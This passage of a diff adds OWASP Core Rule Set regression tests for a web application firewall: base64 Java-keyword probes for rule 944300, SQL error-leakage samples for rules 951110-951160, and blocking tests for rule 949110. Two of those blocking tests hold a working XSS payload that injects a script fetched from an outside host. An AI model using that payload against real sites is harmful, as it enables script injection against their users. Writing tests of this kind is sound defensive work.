dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-299 + desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-300 + desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=d2hpbGVjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-301 + desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: d2hpbGVjbG9zdXJl=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-302 + desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: d2hpbGVjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-303 + desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-304 + desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-305 + desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-306 + desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-307 + desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-308 + desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-309 + desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-310 + desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-311 + desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HdoaWxlY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-312 + desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HdoaWxlY2xvc3VyZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-313 + desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HdoaWxlY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-314 + desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-315 + desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-316 + desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-317 + desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-318 + desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-319 + desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-320 + desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-321 + desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-322 + desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=B3aGlsZWNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-323 + desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: B3aGlsZWNsb3N1cmU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-324 + desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: B3aGlsZWNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-325 + desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-326 + desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-327 + desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-328 + desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-329 + desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-330 + desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml new file mode 100644 index 00000000..02507151 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml @@ -0,0 +1,91 @@ +--- +meta: + author: "studersi" + enabled: true + name: "949110.yaml" + description: | + Test whether the inbound blocking mechanism works by testing whether rule 949110 is triggered. + For these tests, existing test are repurposed with different assertions. Instead of asserting that the original + rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking + rule to be triggered. +tests: + - test_title: 949110-1 + desc: Test is basically identical to 941100-1 (XSS positive test in phase 2) but here we assert that the inbound blocking mechanism is triggered + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: id "949110" + - test_title: 949110-2 + desc: Test is basically identical to 941100-4 (XSS negative test in phase 2) but here we assert that inbound blocking mechanism is not triggered + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: / + headers: + User-Agent: "OWASP CRS test agent" + Referer: http://www.cnn.com + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + no_log_contains: id "949110" + - test_title: 949110-3 + desc: Test is basically identical to 920100-9 (protocol enforcement negative test in phase 1) but here we assert that the inbound blocking mechanism is not triggered + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"949110\"" + - test_title: 949110-4 + desc: Test is basically identical to 920100-10 (protocol enforcement positive test in phase 1) but here we assert that inbound blocking mechanism is triggered + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "REALLYLONGUNREALMETHOD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"949110\"" + - test_title: 949110-5 + desc: Test is basically identical to 949110-0 (see above) but here we assert that the scores are summed up and reported properly + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: " diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml new file mode 100644 index 00000000..be9efacd --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951110.yaml" + description: "Regression tests for rule 951110" +tests: + - test_title: 951110-1 + desc: "Matching Microsoft Access SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression" + output: + log_contains: "id \"951110\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml new file mode 100644 index 00000000..72200968 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951120.yaml" + description: "Regression tests for rule 951120" +tests: + - test_title: 951120-1 + desc: "Matching Oracle SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended" + output: + log_contains: "id \"951120\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml new file mode 100644 index 00000000..2c8e7a70 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951130.yaml" + description: "Regression tests for rule 951130" +tests: + - test_title: 951130-1 + desc: "Matching DB2 SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE" + output: + log_contains: "id \"951130\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml new file mode 100644 index 00000000..64750bbd --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951140.yaml" + description: "Regression tests for rule 951140" +tests: + - test_title: 951140-1 + desc: "Matching EMC SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: '[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: "A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in"' + output: + log_contains: "id \"951140\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml new file mode 100644 index 00000000..139c3817 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951150.yaml" + description: "Regression tests for rule 951150" +tests: + - test_title: 951150-1 + desc: "Matching firebird SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error" + output: + log_contains: "id \"951150\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml new file mode 100644 index 00000000..d57698b8 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951160.yaml" + description: "Regression tests for rule 951160" +tests: + - test_title: 951160-1 + desc: "Matching Frontbase SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES 